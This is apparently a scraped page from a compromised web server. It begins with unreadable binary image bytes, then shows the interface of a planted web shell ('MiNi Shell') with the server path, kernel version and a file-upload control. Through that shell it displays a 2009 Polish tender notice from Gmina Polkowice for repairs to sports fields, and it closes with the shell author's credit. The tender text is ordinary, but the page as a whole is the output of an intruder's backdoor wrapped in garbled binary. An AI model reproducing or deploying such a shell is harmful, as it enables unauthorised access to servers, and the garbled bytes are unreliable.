JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090129/11888-N-2009.html

<p class="kh_header"><b>Polkowice: Remonty  boisk sportowych na terenie gminy</b><br>
<b>Numer ogłoszenia: 11888 - 2009; data zamieszczenia: 29.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Polkowice , Rynek 1, 59-100 Polkowice, woj. dolnośląskie, tel. 076 84 74 121, faks 076 72 46 780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty  boisk sportowych na terenie gminy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie obejmuje bieżące remonty boisk sportowych na terenie miasta i gminy Polkowice  polegające na: naprawie, wymianie, montażu lub demontażu elementów ogrodzeń, nawierzchni, wyposażenia oraz pozostałych elementów boisk tj. siedzisk, murków itp. W cenach jednostkowych należy uwzględnić koszty materiałów, robocizny, a także wszystkie koszty związane z pracami przygotowawczymi, porządkowymi, organizacją terenu robót, transportu itp. oraz deponowania odpadów.Zadanie będzie rozliczane przy zastosowaniu cen jednostkowych, zakres zadania obejmuje: 1.	Demontaż siatki ogrodzeniowej.Ręczne rozebranie elementów siatki wraz ze wszystkimi łącznikami typu nity, śruby itp., posegregowanie, uporządkowanie terenu i oczyszczenie miejsca demontażu, złomowanie lub wywiezienie elementów  na miejsce składowania oraz składowanie. 2.	Demontaż elementów konstrukcji metalowej.Ręczne rozebranie elementów metalowych wraz ze wszystkimi łącznikami typu nity, śruby itp., posegregowanie, uporządkowanie terenu i oczyszczenie miejsca demontażu, złomowanie lub wywiezienie elementów  na miejsce składowania oraz składowanie. 3.	Demontaż elementów drewnianych.Rozebranie elementu drewnianego wraz ze wszystkimi łącznikami typu gwoździe, śruby itp., posegregowanie, uporządkowanie terenu, wywiezienie elementów na miejsce składowania wg wskazań inspektora nadzoru na odległość do 8 km oraz składowanie.4.	Demontaż gotowego elementu z tworzywa sztucznego, gumy, plastiku itp.Ręczne rozebranie elementów z tworzyw sztucznych, gumy itp. wraz ze wszystkimi łącznikami typu gwoździe, śruby itp., posegregowanie, uporządkowanie terenu, wywiezienie elementów na miejsce składowania oraz składowanie.      5.    Demontaż ławki wraz z fundamentem.Ręczne odkopanie fundamentów, demontaż ławki wraz ze wszystkimi elementami, zasypanie wykopu i odtworzenie nawierzchni, uporządkowanie terenu, wywiezienie ławki na miejsce składowania wg wskazań inspektora nadzoru oraz składowanie. 6.   Rozbiórka elementów betonowych.Odkopanie ręczne elementu betonowego, rozbiórka elementu, usunięcie gruzu, zasypanie wykopu, wyrównanie powierzchni, uporządkowanie terenu, wywiezienie elementów betonowych na miejsce składowania oraz składowanie.7.	Rozbiórka elementów murowanych z bloczków betonowych, pustaków, cegieł itp.Usunięcie cegieł, bloczków, pustaków itp., uporządkowanie terenu, wywiezienie elementów betonowych na miejsce składowania oraz składowanie.8.	Usunięcie 1 tony nawierzchni betonowej.Cięcie szczelin, rozkruszenie nawierzchni betonowej młotem wyburzeniowym, odkucie oskardem drobnych pozostałości podbudowy , załadowanie materiału z rozbiórki koparką lub ręcznie na samochód samowyładowczy wraz z wywozem materiału z rozbiórki na miejsce składowania i składowanie.9.	Usunięcie nawierzchni z mieszanki mineralno-bitumicznej.Usunięcie uszkodzonych miejsc nawierzchni z nadaniem regularnych kształtów, oczyszczenie powierzchni, załadowanie materiału z rozbiórki koparką lub ręcznie na samochód samowyładowczy wraz z wywozem materiału z rozbiórki na miejsce składowania i składowanie.10. Usunięcie nawierzchni sypkiej (piasek, żwir, humus, itp.).Usunięcie nawierzchni koparką lub ręcznie, załadowanie materiału  koparką lub ręcznie na samochód samowyładowczy wraz z wywozem materiału z rozbiórki na miejsce składowania i składowanie, uporządkowanie terenu.11.	Uzupełnienie nawierzchni z granulatu gumowego.Usunięcie uszkodzonych fragmentów nawierzchni z nadaniem regularnych kształtów, ułożenie brakującej nawierzchni z gotowych elementów (zgodnie z zaleceniami producenta) na istniejącej podbudowie, uporządkowanie terenu.12.	Uzupełnienie nawierzchni - wbudowanie mieszanki mineralno-bitumicznej.Ogrzanie bitumu i skropienie naprawianego miejsca, rozścielenie mieszanki mineralno-bitumicznej w jednej lub w dwóch warstwach w zależności od głębokości uszkodzenia, zagęszczenie poszczególnych warstw ułożonej mieszanki, skropienie bitumem powierzchni górnej warstwy i zasypanie kruszywem.13.	Uzupełnienie nawierzchni sypkiej (piasek, żwir, humus, itp.).Zakup i transport nawierzchni sypkiej na miejsce robót, uzupełnienie brakującej nawierzchni, wyrównanie nawierzchni, uporządkowanie terenu. Uzupełnienie obrzeża - wbudowanie obrzeża betonowego.Odtworzenie rowków, rozścielenie podsypki piaskowej, ustawienie obrzeży, wyregulowanie obrzeży wg podanych punktów wysokościowych, oczyszczenie i wypełnienie spoin piaskiem lub zaprawą cementową wraz z jej przygotowaniem, obsypanie zewnętrznej ściany obrzeży ziemią wraz z jej ubiciem.14.	Uzupełnienie nawierzchni z kostki  betonowej lub płytek chodnikowych.Odtworzenie  koryta wraz z jego wyprofilowaniem, rozścielenie podsypki piaskowej, ułożenie nawierzchni z kostki betonowej lub płytek chodnikowych na wykonanej i wyrównanej podsypce, ubicie elementów nawierzchni, wypełnienie spoin przez zamulenie piaskiem, usunięcie nadmiaru piasku pozostałego po zamuleniu spoin. 15.	Uzupełnienie siatki ogrodzeniowej.Przygotowanie siatki, transport na miejsce montażu, zamontowanie siatki przy zastosowaniu odpowiednich łączników. 16.	Uzupełnienie ścianki z cegły.Usunięcie uszkodzonej cegły lub pozostałości po cegle, oczyszczenie, przygotowanie otworu, wmurowanie nowej cegły oraz spoinowanie (należy przyjąć wbudowanie cegły pełnej zwykłej), uporządkowanie terenu.17.	Uzupełnienie tynku zewnętrznego.Usunięcie fragmentów odpadającego tynku, oczyszczenie podłoża, zagruntowanie, wykonanie warstwy tynku cementowo-wapiennego, uporządkowanie terenu.18.	Wykonanie elementu z betonu zbrojonego.Roboty pomiarowe, wykonanie wykopu na odkład, wykonanie deskowania w gotowym wykopie, montaż zbrojenia, zabetonowanie elementu z betonu B20 wraz z pielęgnacją betonu, zaizolowanie powierzchni betonowej, zasypanie wykopu, wyrównanie powierzchni, uporządkowanie terenu.19.	Malowanie elementu metalowego.Wyczyszczenie elementu metalowego z brudu, kurzu, rdzy oraz zeskrobanie łuszczącej się farby przy pomocy szpachli, dokładne wyszlifowanie powierzchni papierem ściernym, dwukrotne malowanie farbą do stosowania bezpośrednio na rdzę, uporządkowanie terenu.20.	Malowanie siatki ogrodzeniowej.Wyczyszczenie elementu metalowego z brudu, kurzu, rdzy oraz zeskrobanie łuszczącej się farby przy użyciu szczotki drucianej, dwukrotne malowanie farbą do stosowania bezpośrednio na rdzę, uporządkowanie terenu.21.	Malowanie  powierzchni otynkowanej.Oczyszczenie powierzchni z zagruntowaniem, dwukrotne malowanie farbą emulsyjną zewnętrzną, uporządkowanie terenu.22.	Malowanie elementu drewnianego lakierobejcą.Wyszlifowanie powierzchni papierem ściernym, dwukrotne malowanie lakierobejcą do stosowania na zewnątrz, uporządkowanie terenu.24. Malowanie elementu drewnianego impregnatem.Wyszlifowanie powierzchni papierem ściernym, dwukrotne malowanie impregnatem do stosowania na zewnątrz, uporządkowanie terenu.25. Montaż ławki łącznie z fundamentem (bloczki betonowe).Ręczne wykonanie wykopów pod fundamenty, zamontowanie gotowych fundamentów do ławki (materiał zamawiającego) osadzenie ławki, wypoziomowanie ławki, zasypanie fundamentów i odtworzenie nawierzchni.26.	Montaż elementu drewnianego.Przygotowanie elementów, transport na miejsce montażu, zamontowanie elementu przy zastosowaniu łączników, połączeń ciesielski, uporządkowanie terenu. 27.	Montaż gotowego elementu z tworzywa sztucznego, gumy itp.Wstępne dopasowanie elementu, zamontowanie gotowego elementu przy zastosowaniu łączników, uporządkowanie terenu.28.	Montaż elementu konstrukcji metalowej.Przygotowanie elementu, transport na miejsce montażu, zamontowanie gotowego elementu przy zastosowaniu łączników.       29. Wymiana nawierzchni- wbudowanie mieszanki betonowej.Cięcie szczelin, rozkruszenie nawierzchni betonowej młotem wyburzeniowym, odkucie oskardem drobnych pozostałości podbudowy , załadowanie materiału z rozbiórki koparką lub ręcznie na samochód samowyładowczy wraz z wywozem materiału z rozbiórki na miejsce składowania i składowanie, uzupełnienie ubytków  betonem B20  wraz z pielęgnacją betonu, wyrównanie powierzchni, uporządkowanie terenu.30.	Naprawa  nawierzchni z kostki betonowej lub płytek chodnikowych.Rozebranie nawierzchni z kostki betonowej lub płyt chodnikowych, usunięcie nierówności ( korzenie, kamienie itp.) uzupełnienie podsypki piaskowej , ułożenie nawierzchni na uzupełnionej i wyrównanej podsypce, ubicie elementów nawierzchni, wypełnienie spoin przez zamulenie piaskiem, usunięcie nadmiaru piasku pozostałego po zamuleniu spoin.UWAGA !- Odnośnie pkt 1,2,3,5.* Elementy metalowe posegregować:- nadające się do ponownego wykorzystania przewieść i złożyć w gminnym budynku gospodarczym ul. Cisowa 12 - nie nadające do ponownego wykorzystania sprzedać w punkcie skupu złomu. Wykonawca pomniejszy koszty wykonanych robót o kwotę sprzedaży złomu wynikającą z faktury wystawionej w punkcie skupu.- skorodowane, nie nadające się do sprzedaży w skupie złomu wywieść na miejsce składowania (do 6 km) i składować.Każdorazowo po segregacji należy uzgodnić z inspektorem nadzoru przeznaczenie zdemontowanych elementów metalowych.- Odnośnie pkt 3,5* Elementy drewniane posegregować:-  nie nadające się do ponownego wykorzystania (zbutwiałe) wywieść na miejsce składowania (do 6 km) i składować,-  nadające się na opał przewieść na miejsce wskazane przez inspektora nadzoru (do 8 km) i złożyć- nadające się do ponownego wykorzystania przewieść i złożyć przy gminnym budynku gospodarczym ul. Cisowej 12. Każdorazowo po segregacji, należy uzgodnić z inspektorem nadzoru przeznaczenie zdemontowanych elementów drewnianych.- Odnośnie pkt 20,21,22,23,24* Przed malowaniem wykonawca ma obowiązek zabezpieczyć elementy otoczenia narażone na zabrudzenie przez kapiącą farbę.- Odnośnie 26,27,28* W przypadku wystąpienia konieczności montażu nowych elementów koszt ich będzie rozliczany na podstawie faktury wystawionej przez producenta. Przed zakupem należy uzyskać zgodę inspektora co do ceny oraz producenta.Zamawiający wymaga Wykonawca udzielił minimum 12 - miesięcznej gwarancji jakości na wykonane prace. Termin gwarancji liczony jest od daty bezusterkowego odbioru poszczególnych zakresów robót ujętych w protokołach typowania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do udziału w przetargu dopuszczeni zostaną Wykonawcy, którzy:1.	Spełnią warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych.2.	Spełnią warunki określone w specyfikacji istotnych warunków zamówienia, a w szczególności spełnią poniższe warunki:- są uprawnieni do występowania w obrocie prawnym zgodnie z wymogami ustawowymi,- wykażą i udokumentują realizację co najmniej trzech robót o podobnym charakterze w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie (tj. robót z zakresu remontu nawierzchni, remontu ogrodzeń itp.) o łącznej wartości minimum 100.000 zł brutto, z podaniem ich wartości, dat i miejsca wykonania wraz  z załączeniem dokumentów potwierdzających należyte wykonanie tych robót (np. referencje),- posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, wraz z dowodem uiszczenia należnych składek. Ubezpieczenie powinno być ważne przez cały okres realizacji umowy, w przypadku kiedy ubezpieczenie będzie wygasać w trakcie realizacji umowy wykonawca dołączy do oferty oświadczenie, mocą którego zobowiąże się do przedłużenia ubezpieczenia po jego wygaśnięciu.Ocena spełnienia warunków udziału ma charakter eliminacyjny. Do udziału w postępowaniu dopuszczeni zostaną wykonawcy, którzy spełniają wszystkie warunki udziału w postępowaniu. Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia/nie spełnia na podstawie oświadczenia oraz przedłożonych wraz z ofertą dokumentów wymienionych poniżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Prawidłowo przygotowana oferta  musi zawierać:1.Wypełniony FORMULARZ OFERTOWY (ROZDZIAŁ B) łącznie z wymienionymi tam, przynależnymi do niego nw. załącznikami:	- załącznik nr 1: Cena oferty,	- załącznik nr 2: Oświadczenie wykonawcy,	- załącznik nr 3: Doświadczenie zawodowe2. Dokumenty potwierdzające spełnienie warunków uczestnictwa w postępowaniu:a)	oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy i o przyjęciu warunków SIWZ (załącznik nr 2: Oświadczenie wykonawcy),b)	aktualny odpis z Krajowego Rejestru Sądowego albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. c)	pełnomocnictwo wystawione dla osoby składającej ofertę, podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty przez pełnomocnika,d)	polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, wraz z dowodem uiszczenia należnych składek; ubezpieczenie powinno być ważne przez cały okres realizacji umowy; w przypadku kiedy ubezpieczenie będzie wygasać w trakcie realizacji umowy wykonawca dołączy do oferty oświadczenie, mocą którego zobowiąże się do przedłużenia ubezpieczenia po jego wygaśnięciu,e)	wykaz należycie wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania  a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, w ramach odrębnych umów co najmniej trzech robót o podobnym charakterze (tj. robót z zakresu remontu nawierzchni, remontu ogrodzeń itp.) o łącznej wartości minimum 100.000 zł brutto, z podaniem ich wartości, dat i miejsca wykonania wraz z załączeniem dokumentów potwierdzających należyte wykonanie tych robót ( np. referencje).Uwaga:1.	Dokumenty, o których mowa w pkt. 2. powinny być przedstawione w formie oryginału lub potwierdzonej za zgodność kserokopii dokumentu.2.	Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy oraz dokumentów i oświadczeń potwierdzających spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.3.	W przypadku składania oferty przez podmioty występujące wspólnie, dokumenty wymienione w pkt. 2 lit. a, b, c muszą być złożone przez każdy podmiot.   Każdy z podmiotów występujących wspólnie powinien przedłożyć wraz z ofertą aktualną polisę lub inny dokument ubezpieczenia w zakresie prowadzonej działalności gospodarczej4.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.5.	Przedsiębiorcy występujący jako spółka cywilna zobowiązani są do załączenia umowy spółki cywilnej, celem ustalenia osób uprawnionych do reprezentowania spółki.6.	W przypadku składania oferty przez podmioty występujące wspólnie, do oferty musi być dołączony dokument ustanawiający przez Wykonawców chcących startować wspólnie wspólnego pełnomocnika.7.	Wykonawca zobowiązuje się sporządzić umowę konsorcjum po wyborze oferty tj. w okresie między wygraniem przetargu a podpisaniem umowy o zamówienie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.ug.polkowice.pl/?ID2=przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Polkowice, 59-100 Polkowice, ul. Rynek 1, pok. 118.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2009 godzina 11:00, miejsce: Urząd Gminy Polkowice, ul. Rynek 1, 59-100 Polkowice, pok. 10. Kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com